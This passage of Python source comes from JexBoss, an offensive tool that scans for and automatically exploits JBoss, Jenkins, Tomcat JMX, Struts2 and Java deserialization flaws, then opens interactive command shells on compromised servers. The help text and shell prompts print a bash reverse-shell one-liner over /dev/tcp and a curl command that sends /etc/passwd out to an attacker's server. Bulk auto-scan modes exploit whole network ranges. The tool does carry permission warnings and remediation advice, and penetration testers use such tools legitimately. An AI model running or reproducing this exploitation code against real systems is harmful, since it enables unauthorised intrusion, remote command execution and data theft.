r.getheader('Content-Type'): 418 | paths[vector] = 200 419 | else: 420 | paths[vector] = 505 421 | 422 | # other jboss vector 423 | else: 424 | r = gl_http_pool.request('HEAD', url + str(paths[vector]), redirect=False, headers=headers) 425 | # if head method is not allowed/supported, try GET 426 | if r.status in (405, 406): 427 | r = gl_http_pool.request('GET', url + str(paths[vector]), redirect=False, headers=headers) 428 | # check if the server respond with 200/500 for all requests 429 | if r.status in (200, 500): 430 | r = gl_http_pool.request('GET', url + str(paths[vector])+ '/github.com/joaomatosf/jexboss', redirect=False,headers=headers) 431 | 432 | if r.status == 200: 433 | r.status = 505 434 | else: 435 | r.status = 200 436 | 437 | paths[vector] = r.status 438 | 439 | # ---------------- 440 | # Analysis of the results 441 | # ---------------- 442 | # check if the proxy do not support running in the same port of the target 443 | if r is not None and r.status == 400 and gl_args.proxy: 444 | if parse_url(gl_args.proxy).port == url_check.port: 445 | print_and_flush(RED + "[ ERROR ]\n * An error occurred because the proxy server is running on the " 446 | "same port as the server port (port %s).\n" 447 | " Please use a different port in the proxy.\n" % url_check.port + ENDC) 448 | logging.critical("Proxy returns 400 Bad Request because is running in the same port as the server") 449 | fatal_error = True 450 | break 451 | 452 | # check if it's false positive 453 | if r is not None and len(r.getheaders()) == 0: 454 | print_and_flush(RED + "[ ERROR ]\n * The server %s is not an HTTP server.\n" % url + ENDC) 455 | logging.error("The server %s is not an HTTP server." % url) 456 | for key in paths: paths[key] = 505 457 | break 458 | 459 | if paths[vector] in (301, 302, 303, 307, 308): 460 | url_redirect = r.get_redirect_location() 461 | print_and_flush(GREEN + " [ REDIRECT ]\n * The server sent a redirect to: %s\n" % url_redirect) 462 | elif paths[vector] == 200 or paths[vector] == 500: 463 | if vector == "admin-console": 464 | print_and_flush(RED + " [ EXPOSED ]" + ENDC) 465 | logging.info("Server %s: EXPOSED" %url) 466 | elif vector == "Jenkins": 467 | print_and_flush(RED + " [ POSSIBLE VULNERABLE ]" + ENDC) 468 | logging.info("Server %s: RUNNING JENKINS" %url) 469 | elif vector == "JMX Tomcat": 470 | print_and_flush(RED + " [ MAYBE VULNERABLE ]" + ENDC) 471 | logging.info("Server %s: RUNNING JENKINS" %url) 472 | else: 473 | print_and_flush(RED + " [ VULNERABLE ]" + ENDC) 474 | logging.info("Server %s: VULNERABLE" % url) 475 | elif paths[vector] == 100: 476 | paths[vector] = 200 477 | print_and_flush(RED + " [ INCONCLUSIVE - NEED TO CHECK ]" + ENDC) 478 | logging.info("Server %s: INCONCLUSIVE - NEED TO CHECK" % url) 479 | elif paths[vector] == 110: 480 | logging.info("Server %s: CHECK OTHERS PARAMETERS" % url) 481 | else: 482 | print_and_flush(GREEN + " [ OK ]") 483 | except Exception as err: 484 | print_and_flush(RED + "\n * An error occurred while connecting to the host %s (%s)\n" % (url, err) + ENDC) 485 | logging.info("An error occurred while connecting to the host %s" % url, exc_info=traceback) 486 | paths[vector] = 505 487 | 488 | if fatal_error: 489 | exit(1) 490 | else: 491 | return paths 492 | 493 | 494 | def auto_exploit(url, exploit_type): 495 | """ 496 | Automatically exploit a URL 497 | :param url: The URL to exploit 498 | :param exploit_type: One of the following 499 | exploitJmxConsoleFileRepository: tested and working in JBoss 4 and 5 500 | exploitJmxConsoleMainDeploy: tested and working in JBoss 4 and 6 501 | exploitWebConsoleInvoker: tested and working in JBoss 4 502 | exploitJMXInvokerFileRepository: tested and working in JBoss 4 and 5 503 | exploitAdminConsole: tested and working in JBoss 5 and 6 (with default password) 504 | """ 505 | if exploit_type in ("Application Deserialization", "Servlet Deserialization"): 506 | print_and_flush(GREEN + "\n * Preparing to send exploit to %s. Please wait...\n" % url) 507 | else: 508 | print_and_flush(GREEN + "\n * Sending exploit code to %s. Please wait...\n" % url) 509 | 510 | result = 505 511 | if exploit_type == "jmx-console": 512 | 513 | result = _exploits.exploit_jmx_console_file_repository(url) 514 | if result != 200 and result != 500: 515 | result = _exploits.exploit_jmx_console_main_deploy(url) 516 | 517 | elif exploit_type == "web-console": 518 | 519 | # if the user not provided the path 520 | if url.endswith("/web-console/Invoker") or url.endswith("/web-console/Invoker/"): 521 | url = url.replace("/web-console/Invoker", "") 522 | 523 | result = _exploits.exploit_web_console_invoker(url) 524 | if result == 404: 525 | host, port = get_host_port_reverse_params() 526 | if host == port == gl_args.cmd == None: return False 527 | result = _exploits.exploit_servlet_deserialization(url + "/web-console/Invoker", host=host, port=port, 528 | cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget, 529 | gadget_file=gl_args.load_gadget) 530 | elif exploit_type == "JMXInvokerServlet": 531 | 532 | # if the user not provided the path 533 | if url.endswith("/invoker/JMXInvokerServlet") or url.endswith("/invoker/JMXInvokerServlet/"): 534 | url = url.replace("/invoker/JMXInvokerServlet", "") 535 | 536 | result = _exploits.exploit_jmx_invoker_file_repository(url, 0) 537 | if result != 200 and result != 500: 538 | result = _exploits.exploit_jmx_invoker_file_repository(url, 1) 539 | if result == 404: 540 | host, port = get_host_port_reverse_params() 541 | if host == port == gl_args.cmd == None: return False 542 | result = _exploits.exploit_servlet_deserialization(url + "/invoker/JMXInvokerServlet", host=host, port=port, 543 | cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget, 544 | gadget_file=gl_args.load_gadget) 545 | 546 | elif exploit_type == "admin-console": 547 | 548 | result = _exploits.exploit_admin_console(url, gl_args.jboss_login) 549 | 550 | elif exploit_type == "Jenkins": 551 | 552 | host, port = get_host_port_reverse_params() 553 | if host == port == gl_args.cmd == None: return False 554 | result = _exploits.exploit_jenkins(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, 555 | gadget=gl_args.gadget, show_payload=gl_args.show_payload) 556 | elif exploit_type == "JMX Tomcat": 557 | 558 | host, port = get_host_port_reverse_params() 559 | if host == port == gl_args.cmd == None: return False 560 | result = _exploits.exploit_jrmi(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows) 561 | 562 | elif exploit_type == "Application Deserialization": 563 | 564 | host, port = get_host_port_reverse_params() 565 | 566 | if host == port == gl_args.cmd == gl_args.load_gadget == None: return False 567 | 568 | result = _exploits.exploit_application_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, 569 | param=gl_args.post_parameter, force=gl_args.force, 570 | gadget_type=gl_args.gadget, show_payload=gl_args.show_payload, 571 | gadget_file=gl_args.load_gadget) 572 | 573 | elif exploit_type == "Servlet Deserialization": 574 | 575 | host, port = get_host_port_reverse_params() 576 | 577 | if host == port == gl_args.cmd == gl_args.load_gadget == None: return False 578 | 579 | result = _exploits.exploit_servlet_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, 580 | gadget=gl_args.gadget, gadget_file=gl_args.load_gadget) 581 | 582 | elif exploit_type == "Struts2": 583 | 584 | result = 200 585 | 586 | # if it seems to be exploited (201 is for jboss exploited with gadget) 587 | if result == 200 or result == 500 or result == 201: 588 | 589 | # if not auto_exploit, ask type enter to continue... 590 | if not gl_args.auto_exploit: 591 | 592 | if exploit_type in ("Application Deserialization", "Jenkins", "JMX Tomcat", "Servlet Deserialization") or result == 201: 593 | print_and_flush(BLUE + " * The exploit code was successfully sent. Check if you received the reverse shell\n" 594 | " connection on your server or if your command was executed. \n"+ ENDC+ 595 | " Type [ENTER] to continue...\n") 596 | # wait while enter is typed 597 | input().lower() if version_info[0] >= 3 else raw_input().lower() 598 | return True 599 | else: 600 | if exploit_type == 'Struts2': 601 | shell_http_struts(url) 602 | else: 603 | print_and_flush(GREEN + " * Successfully deployed code! Starting command shell. Please wait...\n" + ENDC) 604 | shell_http(url, exploit_type) 605 | 606 | # if auto exploit mode, print message and continue... 607 | else: 608 | print_and_flush(GREEN + " * Successfully deployed/sended code via vector %s\n *** Run JexBoss in Standalone mode " 609 | "to open command shell. ***" %(exploit_type) + ENDC) 610 | return True 611 | 612 | # if not exploited, print error messagem and ask for type enter 613 | else: 614 | if exploit_type == 'admin-console': 615 | print_and_flush(GREEN + "\n * You can still try to exploit deserialization vulnerabilitie in ViewState!\n" + 616 | " Try this: python jexboss.py -u %s/admin-console/login.seam --app-unserialize\n" %url + 617 | " Type [ENTER] to continue...\n" + ENDC) 618 | 619 | else: 620 | print_and_flush(RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" + 621 | " Type [ENTER] to continue...\n" + ENDC) 622 | logging.error("Could not exploit the server %s automatically. HTTP Code: %s" %(url, result)) 623 | # wait while enter is typed 624 | input().lower() if version_info[0] >= 3 else raw_input().lower() 625 | return False 626 | 627 | 628 | def ask_for_reverse_host_and_port(): 629 | print_and_flush(GREEN + " * Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.\n" 630 | " OBS: You can also use the --cmd \"command\" to send specific commands to run on the server."+NORMAL) 631 | 632 | # If not *nix (that is, if somethine like git bash on Rwindow$) 633 | if not sys.stdout.isatty(): 634 | print_and_flush(" IP Address (RHOST): ", same_line=True) 635 | host = input().lower() if version_info[0] >= 3 else raw_input().lower() 636 | print_and_flush(" Port (RPORT): ", same_line=True) 637 | port = input().lower() if version_info[0] >= 3 else raw_input().lower() 638 | else: 639 | host = input(" IP Address (RHOST): ").lower() if version_info[0] >= 3 else raw_input(" IP Address (RHOST): ").lower() 640 | port = input(" Port (RPORT): ").lower() if version_info[0] >= 3 else raw_input(" Port (RPORT): ").lower() 641 | 642 | print ("") 643 | return str(host), str(port) 644 | 645 | 646 | def get_host_port_reverse_params(): 647 | # if reverse host were provided in the args, take it 648 | if gl_args.reverse_host: 649 | 650 | if gl_args.windows: 651 | jexboss.print_and_flush(RED + "\n * WINDOWS Systems still do not support reverse shell.\n" 652 | " Use option --cmd instead of --reverse-shell...\n" + ENDC + 653 | " Type [ENTER] to continue...\n") 654 | # wait while enter is typed 655 | input().lower() if version_info[0] >= 3 else raw_input().lower() 656 | return None, None 657 | 658 | tokens = gl_args.reverse_host.split(":") 659 | if len(tokens) != 2: 660 | host, port = ask_for_reverse_host_and_port() 661 | else: 662 | host = tokens[0] 663 | port = tokens[1] 664 | # if neither cmd nor reverse nor load_gadget was provided, ask host and port 665 | elif gl_args.cmd is None and gl_args.load_gadget is None: 666 | host, port = ask_for_reverse_host_and_port() 667 | else: 668 | # if cmd or gadget file ware privided 669 | host, port = None, None 670 | 671 | return host, port 672 | 673 | 674 | def shell_http_struts(url): 675 | """ 676 | Connect to an HTTP shell 677 | :param url: struts app url 678 | :param shell_type: The type of shell to connect to 679 | """ 680 | print_and_flush("# ----------------------------------------- #\n") 681 | print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type sometime like: \n\n" 682 | "\n" +ENDC+ 683 | " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n" 684 | " \n"+GREEN+ 685 | " And so on... =]\n" +ENDC 686 | ) 687 | print_and_flush("# ----------------------------------------- #\n") 688 | 689 | resp = _exploits.exploit_struts2_jakarta_multipart(url,'whoami', gl_args.cookies) 690 | 691 | print_and_flush(resp.replace('\\n', '\n'), same_line=True) 692 | logging.info("Server %s exploited!" %url) 693 | 694 | while 1: 695 | print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" +ENDC) 696 | 697 | if not sys.stdout.isatty(): 698 | print_and_flush("Shell> ", same_line=True) 699 | cmd = input() if version_info[0] >= 3 else raw_input() 700 | else: 701 | cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ") 702 | 703 | if cmd == "exit": 704 | break 705 | 706 | resp = _exploits.exploit_struts2_jakarta_multipart(url, cmd, gl_args.cookies) 707 | print_and_flush(resp.replace('\\n', '\n')) 708 | 709 | 710 | # FIX: capture the readtimeout File "jexboss.py", line 333, in shell_http 711 | def shell_http(url, shell_type): 712 | """ 713 | Connect to an HTTP shell 714 | :param url: The URL to connect to 715 | :param shell_type: The type of shell to connect to 716 | """ 717 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 718 | "Connection": "keep-alive", 719 | "User-Agent": get_random_user_agent()} 720 | 721 | if gl_args.disable_check_updates: 722 | headers['no-check-updates'] = 'true' 723 | 724 | if shell_type == "jmx-console" or shell_type == "web-console" or shell_type == "admin-console": 725 | path = '/jexws4/jexws4.jsp?' 726 | elif shell_type == "JMXInvokerServlet": 727 | path = '/jexinv4/jexinv4.jsp?' 728 | 729 | gl_http_pool.request('GET', url+path, redirect=False, headers=headers) 730 | 731 | sleep(7) 732 | resp = "" 733 | print_and_flush("# ----------------------------------------- # LOL # ----------------------------------------- #\n") 734 | print_and_flush(RED + " * " + url + ": \n" + ENDC) 735 | print_and_flush("# ----------------------------------------- #\n") 736 | print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type the command: \n\n" 737 | " jexremote=YOUR_IP:YOUR_PORT\n\n" + ENDC + GREEN + 738 | " Example:\n" +ENDC+ 739 | " Shell>jexremote=192.168.0.10:4444\n" 740 | "\n" +GREEN+ 741 | " Or use other techniques of your choice, like:\n" +ENDC+ 742 | " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n" 743 | " \n"+GREEN+ 744 | " And so on... =]\n" +ENDC 745 | ) 746 | print_and_flush("# ----------------------------------------- #\n") 747 | 748 | for cmd in ['uname -a', 'cat /etc/issue', 'id']: 749 | cmd = urlencode({"ppp": cmd}) 750 | try: 751 | r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers) 752 | resp += " " + str(r.data).split(">")[1] 753 | except: 754 | print_and_flush(RED + " * Apparently an IPS is blocking some requests. Check for updates will be disabled...\n\n"+ENDC) 755 | logging.warning("Disabling checking for updates.", exc_info=traceback) 756 | headers['no-check-updates'] = 'true' 757 | 758 | print_and_flush(resp.replace('\\n', '\n'), same_line=True) 759 | logging.info("Server %s exploited!" %url) 760 | 761 | while 1: 762 | print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" +ENDC) 763 | 764 | if not sys.stdout.isatty(): 765 | print_and_flush("Shell> ", same_line=True) 766 | cmd = input() if version_info[0] >= 3 else raw_input() 767 | else: 768 | cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ") 769 | 770 | if cmd == "exit": 771 | break 772 | 773 | cmd = urlencode({"ppp": cmd}) 774 | try: 775 | r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers) 776 | except: 777 | print_and_flush(RED + " * Error contacting the command shell. Try again and see logs for details ...") 778 | logging.error("Error contacting the command shell", exc_info=traceback) 779 | continue 780 | 781 | resp = str(r.data) 782 | if r.status == 404: 783 | print_and_flush(RED + " * Error contacting the command shell. Try again later...") 784 | continue 785 | stdout = "" 786 | try: 787 | stdout = resp.split("pre>")[1] 788 | except: 789 | print_and_flush(RED + " * Error contacting the command shell. Try again later...") 790 | if stdout.count("An exception occurred processing JSP page") == 1: 791 | print_and_flush(RED + " * Error executing command \"%s\". " % cmd.split("=")[1] + ENDC) 792 | else: 793 | print_and_flush(stdout.replace('\\n', '\n')) 794 | 795 | 796 | def clear(): 797 | """ 798 | Clears the console 799 | """ 800 | if name == 'posix': 801 | system('clear') 802 | elif name == ('ce', 'nt', 'dos'): 803 | system('cls') 804 | 805 | 806 | def banner(): 807 | """ 808 | Print the banner 809 | """ 810 | clear() 811 | print_and_flush(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n" 812 | " | * And others Java Deserialization Vulnerabilities * | \n" 813 | " | |\n" 814 | " | @author: João Filho Matos Figueiredo |\n" 815 | " | @contact: joaomatosf@gmail.com |\n" 816 | " | |\n" 817 | " | @update: https://github.com/joaomatosf/jexboss |\n" 818 | " #______________________________________________________#\n") 819 | print_and_flush(RED1 + " @version: %s" % __version__) 820 | print_and_flush (ENDC) 821 | 822 | 823 | def help_usage(): 824 | usage = (BOLD + BLUE + " Examples: [for more options, type python jexboss.py -h]\n" + ENDC + 825 | BLUE + "\n For simple usage, you must provide the host name or IP address you\n" 826 | " want to test [-host or -u]:\n" + 827 | GREEN + "\n $ python jexboss.py -u https://site.com.br" + 828 | 829 | BLUE + "\n\n For Java Deserialization Vulnerabilities in HTTP POST parameters. \n" 830 | " This will ask for an IP address and port to try to get a reverse shell:\n" + 831 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize" + 832 | 833 | BLUE + "\n\n For Java Deserialization Vulnerabilities in a custom HTTP parameter and \n" 834 | " to send a custom command to be executed on the exploited server:\n" + 835 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize\n" 836 | " -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'" + 837 | 838 | BLUE + "\n\n For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n"+ 839 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n" + 840 | 841 | BLUE + "\n\n To test Java Deserialization Vulnerabilities with DNS Lookup:\n" + 842 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns test.yourdomain.com" + 843 | 844 | BLUE + "\n\n For Jenkins CLI Deserialization Vulnerabilitie:\n"+ 845 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/jenkins --jenkins"+ 846 | 847 | BLUE + "\n\n For Apache Struts2 Vulnerabilities (CVE-2017-5638):\n" + 848 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path.action --struts2\n" + 849 | 850 | BLUE + "\n\n For auto scan mode, you must provide the network in CIDR format, " 851 | "\n list of ports and filename for store results:\n" + 852 | GREEN + "\n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 \n" 853 | " -results report_auto_scan.log" + 854 | 855 | BLUE + "\n\n For file scan mode, you must provide the filename with host list " 856 | "\n to be scanned (one host per line) and filename for store results:\n" + 857 | GREEN + "\n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n" + ENDC) 858 | return usage 859 | 860 | 861 | def network_args(string): 862 | try: 863 | if version_info[0] >= 3: 864 | value = ipaddress.ip_network(string) 865 | else: 866 | value = ipaddress.ip_network(unicode(string)) 867 | except: 868 | msg = "%s is not a network address in CIDR format." % string 869 | logging.error("%s is not a network address in CIDR format." % string) 870 | raise argparse.ArgumentTypeError(msg) 871 | return value 872 | 873 | 874 | def main(): 875 | """ 876 | Run interactively. Call when the module is run by itself. 877 | :return: Exit code 878 | """ 879 | # check for Updates 880 | if not gl_args.disable_check_updates: 881 | updates = _updates.check_updates() 882 | if updates: 883 | print_and_flush(BLUE + BOLD + "\n\n * An update is available and is recommended update before continuing.\n" + 884 | " Do you want to update now?") 885 | if not sys.stdout.isatty(): 886 | print_and_flush(" YES/no? ", same_line=True) 887 | pick = input().lower() if version_info[0] >= 3 else raw_input().lower() 888 | else: 889 | pick = input(" YES/no? ").lower() if version_info[0] >= 3 else raw_input(" YES/no? ").lower() 890 | 891 | print_and_flush(ENDC) 892 | if pick != "no": 893 | updated = _updates.auto_update() 894 | if updated: 895 | print_and_flush(GREEN + BOLD + "\n * The JexBoss has been successfully updated. Please run again to enjoy the updates.\n" +ENDC) 896 | exit(0) 897 | else: 898 | print_and_flush(RED + BOLD + "\n\n * An error occurred while updating the JexBoss. Please try again..\n" +ENDC) 899 | exit(1) 900 | 901 | vulnerables = False 902 | # check vulnerabilities for standalone mode 903 | if gl_args.mode == 'standalone': 904 | url = gl_args.host 905 | scan_results = check_vul(url) 906 | # performs exploitation for jboss vulnerabilities 907 | for vector in scan_results: 908 | if scan_results[vector] == 200 or scan_results[vector] == 500: 909 | vulnerables = True 910 | if gl_args.auto_exploit: 911 | auto_exploit(url, vector) 912 | else: 913 | 914 | if vector == "Application Deserialization": 915 | msg_confirm = " If successful, this operation will provide a reverse shell. You must enter the\n" \ 916 | " IP address and Port of your listening server.\n" 917 | else: 918 | msg_confirm = " If successful, this operation will provide a simple command shell to execute \n" \ 919 | " commands on the server..\n" 920 | 921 | print_and_flush(BLUE + "\n\n * Do you want to try to run an automated exploitation via \"" + 922 | BOLD + vector + NORMAL + "\" ?\n" + 923 | msg_confirm + 924 | RED + " Continue only if you have permission!" + ENDC) 925 | if not sys.stdout.isatty(): 926 | print_and_flush(" yes/NO? ", same_line=True) 927 | pick = input().lower() if version_info[0] >= 3 else raw_input().lower() 928 | else: 929 | pick = input(" yes/NO? ").lower() if version_info[0] >= 3 else raw_input(" yes/NO? ").lower() 930 | 931 | if pick == "yes": 932 | auto_exploit(url, vector) 933 | 934 | # check vulnerabilities for auto scan mode 935 | elif gl_args.mode == 'auto-scan': 936 | file_results = open(gl_args.results, 'w') 937 | file_results.write("JexBoss Scan Mode Report\n\n") 938 | for ip in gl_args.network.hosts(): 939 | if gl_interrupted: break 940 | for port in gl_args.ports.split(","): 941 | if check_connectivity(ip, port): 942 | url = "{0}:{1}".format(ip,port) 943 | ip_results = check_vul(url) 944 | for key in ip_results.keys(): 945 | if ip_results[key] == 200 or ip_results[key] == 500: 946 | vulnerables = True 947 | if gl_args.auto_exploit: 948 | result_exploit = auto_exploit(url, key) 949 | if result_exploit: 950 | file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key)) 951 | else: 952 | file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key)) 953 | else: 954 | file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key)) 955 | 956 | file_results.flush() 957 | else: 958 | print_and_flush (RED+"\n * Host %s:%s does not respond."% (ip,port)+ENDC) 959 | file_results.close() 960 | # check vulnerabilities for file scan mode 961 | elif gl_args.mode == 'file-scan': 962 | file_results = open(gl_args.out, 'w') 963 | file_results.write("JexBoss Scan Mode Report\n\n") 964 | file_input = open(gl_args.file, 'r') 965 | for url in file_input.readlines(): 966 | if gl_interrupted: break 967 | url = url.strip() 968 | ip = str(parse_url(url)[2]) 969 | port = parse_url(url)[3] if parse_url(url)[3] != None else 80 970 | if check_connectivity(ip, port): 971 | url_results = check_vul(url) 972 | for key in url_results.keys(): 973 | if url_results[key] == 200 or url_results[key] == 500: 974 | vulnerables = True 975 | if gl_args.auto_exploit: 976 | result_exploit = auto_exploit(url, key) 977 | if result_exploit: 978 | file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key)) 979 | else: 980 | file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key)) 981 | else: 982 | file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key)) 983 | 984 | file_results.flush() 985 | else: 986 | print_and_flush (RED + "\n * Host %s:%s does not respond." % (ip, port) + ENDC) 987 | file_results.close() 988 | 989 | # resume results 990 | if vulnerables: 991 | banner() 992 | print_and_flush(RED + BOLD+" Results: potentially compromised server!" + ENDC) 993 | if gl_args.mode == 'file-scan': 994 | print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.out) + ENDC) 995 | elif gl_args.mode == 'auto-scan': 996 | print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.results) + ENDC) 997 | 998 | print_and_flush(GREEN + " ---------------------------------------------------------------------------------\n" 999 | +BOLD+ " Recommendations: \n" +ENDC+ 1000 | GREEN+ " - Remove web consoles and services that are not used, eg:\n" 1001 | " $ rm web-console.war http-invoker.sar jmx-console.war jmx-invoker-adaptor-server.sar admin-console.war\n" 1002 | " - Use a reverse proxy (eg. nginx, apache, F5)\n" 1003 | " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n" 1004 | " - Search vestiges of exploitation within the directories \"deploy\" and \"management\".\n" 1005 | " - Do NOT TRUST serialized objects received from the user\n" 1006 | " - If possible, stop using serialized objects as input!\n" 1007 | " - If you need to work with serialization, consider migrating to the Gson lib.\n" 1008 | " - Use a strict whitelist with Look-ahead[3] before deserialization\n" 1009 | " - For a quick (but not definitive) remediation for the viewState input, store the state \n" 1010 | " of the view components on the server (this will increase the heap memory consumption): \n" 1011 | " In web.xml, change the \"client\" parameter to \"server\" on STATE_SAVING_METHOD.\n" 1012 | " - Upgrade Apache Struts: https://cwiki.apache.org/confluence/display/WW/S2-045\n" 1013 | "\n References:\n" 1014 | " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n" 1015 | " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n" 1016 | " [3] - https://www.ibm.com/developerworks/library/se-lookahead/\n" 1017 | " [4] - https://www.owasp.org/index.php/Deserialization_of_untrusted_data\n" 1018 | "\n" 1019 | " - If possible, discard this server!\n" 1020 | " ---------------------------------------------------------------------------------") 1021 | else: 1022 | print_and_flush(GREEN + "\n\n * Results: \n" + 1023 | " The server is not vulnerable to bugs tested ... :D\n" + ENDC) 1024 | # infos 1025 | print_and_flush(ENDC + " * Info: review, suggestions, updates, etc: \n" + 1026 | " https://github.com/joaomatosf/jexboss\n") 1027 | 1028 | print_and_flush(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n" + 1029 | GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n" ) 1030 | 1031 | 1032 | print_and_flush(ENDC) 1033 | 1034 | #banner() 1035 | 1036 | 1037 | if __name__ == "__main__": 1038 | 1039 | 1040 | parser = argparse.ArgumentParser( 1041 | formatter_class=argparse.RawDescriptionHelpFormatter, 1042 | #description="JexBoss v%s: JBoss verify and EXploitation Tool" %__version, 1043 | description=textwrap.dedent(RED1 + 1044 | "\n # --- JexBoss: Jboss verify and EXploitation Tool --- #\n" 1045 | " | And others Java Deserialization Vulnerabilities | \n" 1046 | " | |\n" 1047 | " | @author: João Filho Matos Figueiredo |\n" 1048 | " | @contact: joaomatosf@gmail.com |\n" 1049 | " | |\n" 1050 | " | @updates: https://github.com/joaomatosf/jexboss |\n" 1051 | " #______________________________________________________#\n" 1052 | " @version: " + __version__ + "\n" + help_usage()), 1053 | epilog="", 1054 | prog="JexBoss" 1055 | ) 1056 | 1057 | group_standalone = parser.add_argument_group('Standalone mode') 1058 | group_advanced = parser.add_argument_group('Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER)') 1059 | group_auto_scan = parser.add_argument_group('Auto scan mode') 1060 | group_file_scan = parser.add_argument_group('File scan mode') 1061 | 1062 | # optional parameters --------------------------------------------------------------------------------------- 1063 | parser.add_argument('--version', action='version', version='%(prog)s ' + __version__) 1064 | parser.add_argument("--auto-exploit", "-A", help="Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)", 1065 | action='store_true') 1066 | parser.add_argument("--disable-check-updates", "-D", help="Disable two updates checks: 1) Check for updates " 1067 | "performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates " 1068 | "performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt", 1069 | action='store_true') 1070 | parser.add_argument('-mode', help="Operation mode (DEFAULT: standalone)", choices=['standalone', 'auto-scan', 'file-scan'], default='standalone') 1071 | parser.add_argument("--app-unserialize", "-j", 1072 | help="Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, " 1073 | "oldFormData, etc)", action='store_true') 1074 | parser.add_argument("--servlet-unserialize", "-l", 1075 | help="Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)", 1076 | action='store_true') 1077 | parser.add_argument("--jboss", help="Check only for JBOSS vectors.", action='store_true') 1078 | parser.add_argument("--jenkins", help="Check only for Jenkins CLI vector (CVE-2015-5317).", action='store_true') 1079 | parser.add_argument("--struts2", help="Check only for Struts2 Jakarta Multipart parser (CVE-2017-5638).", action='store_true') 1080 | parser.add_argument("--jmxtomcat", help="Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and " 1081 | "CVE-2016-3427). OBS: Will not be checked by default.", action='store_true') 1082 | 1083 | parser.add_argument('--proxy', "-P", help="Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)", ) 1084 | parser.add_argument('--proxy-cred', "-L", help="Proxy authentication credentials (eg -L name:password)", metavar='LOGIN:PASS') 1085 | parser.add_argument('--jboss-login', "-J", help="JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 " 1086 | "(default: admin:admin)", metavar='LOGIN:PASS', default='admin:admin') 1087 | parser.add_argument('--timeout', help="Seconds to wait before timeout connection (default 3)", default=3, type=int) 1088 | 1089 | parser.add_argument('--cookies', help="Specify cookies for Struts 2 Exploit. Use this to test features that require authentication. " 1090 | "Format: \"NAME1=VALUE1; NAME2=VALUE2\" (eg. --cookie \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"" 1091 | , type=str, metavar='NAME=VALUE') 1092 | #parser.add_argument('--retries', help="Retries when the connection timeouts (default 3)", default=3, type=int) 1093 | 1094 | # advanced parameters --------------------------------------------------------------------------------------- 1095 | group_advanced.add_argument("--reverse-host", "-r", help="Remote host address and port for reverse shell when exploiting " 1096 | "Java Deserialization Vulnerabilities in application layer " 1097 | "(for now, working only against *nix systems)" 1098 | "(eg. 192.168.0.10:1331)", type=str, metavar='RHOST:RPORT') 1099 | group_advanced.add_argument("--cmd", "-x", 1100 | help="Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)" 1101 | , type=str, metavar='CMD') 1102 | group_advanced.add_argument("--dns", help="Specifies the dns query for use with \"dns\" Gadget", type=str, metavar='URL') 1103 | group_advanced.add_argument("--windows", "-w", help="Specifies that the commands are for rWINDOWS System$ (cmd.exe)", 1104 | action='store_true') 1105 | group_advanced.add_argument("--post-parameter", "-H", help="Specify the parameter to find and inject serialized objects into it." 1106 | " (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others)" 1107 | " (DEFAULT: javax.faces.ViewState)", 